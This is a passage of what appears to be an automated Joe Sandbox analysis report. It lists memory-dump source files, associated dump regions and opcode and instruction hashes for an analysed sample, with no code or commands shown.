                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45c6a88f21aacf917b1087abd522809a4b116119c2b4cfd0df2558b482af78b8
                                          • Instruction ID: 07b6eae2900a46adfbec6aca84fa867fad3076ff1cb3388b2278962ae55a1b91
                                          • Opcode Fuzzy Hash: 45c6a88f21aacf917b1087abd522809a4b116119c2b4cfd0df2558b482af78b8
                                          • Instruction Fuzzy Hash: C741F077F206280BE34C99699CA526A73C297C4310B4A863DDB96D73C6EC78ED16D3C4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                          • Instruction ID: 48b692ce5991d418a4ae8b8b099d35f08018c114b4e5dcef7fe5782c5f7a162f
                                          • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                          • Instruction Fuzzy Hash: F931B03170871A4BC754AD69C4C822FFAD2BBD9360F558A3DE589C3385EB718C48C682
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                          • Instruction ID: f6fb8f7392458d94b55a6c8231ece3d4ba15dd8edd3ebf6a7771166715935065
                                          • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                          • Instruction Fuzzy Hash: 5EF04F73B656290BA360CDB66D01197A2C3A7C0774F1F856AEC44D7642E938DC4786CA
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                          • Instruction ID: 7372ec29a01d3e257bde3953bdb21c9ef9e1a5c2a20e0b663c3718fd79ba31af
                                          • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                          • Instruction Fuzzy Hash: FDF08C33A20A340B6360CC7A8D05097A2C797C86B0B0FC96AECA0E7206E930EC0656D5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58e9adfc1db39c842bd99b86c29a667cab98aa41c022415067581be5255bb902
                                          • Instruction ID: ad82a1f06fdd0192b633d4ea64cdd70ca6182ee66227c10387f4e395218e028a
                                          • Opcode Fuzzy Hash: 58e9adfc1db39c842bd99b86c29a667cab98aa41c022415067581be5255bb902
                                          • Instruction Fuzzy Hash: 34B012319002014BD706CB38DD7509133B27392300399C4FDD00345055D63DD012C604
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: [
                                          • API String ID: 0-784033777
                                          • Opcode ID: 98ba387379e406195a14df33584fe6e3f2aabf748e0a2fe57e9c994e75c0c7a3
                                          • Instruction ID: 240de72ccbedbe0fbbea5ccd8922e1c79844fdda842dde1cd99f028f938b9d01
                                          • Opcode Fuzzy Hash: 98ba387379e406195a14df33584fe6e3f2aabf748e0a2fe57e9c994e75c0c7a3
                                          • Instruction Fuzzy Hash: D6B1677993A3835BDB39BE20889D73A7AC8EB5530CF18052EE8C5C61C1EB65C8748752
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: islower
                                          • String ID: $
                                          • API String ID: 3326879001-3993045852
                                          • Opcode ID: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                          • Instruction ID: 4b38f98ae4afae9158d5d64a51a0b5f96d7ed63b4a543d0829bed2a3b53b41d8
                                          • Opcode Fuzzy Hash: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                          • Instruction Fuzzy Hash: 8061B8706083458BEB149F69C88022FFFE2BFCA314F544E2EE49587392E774D9458792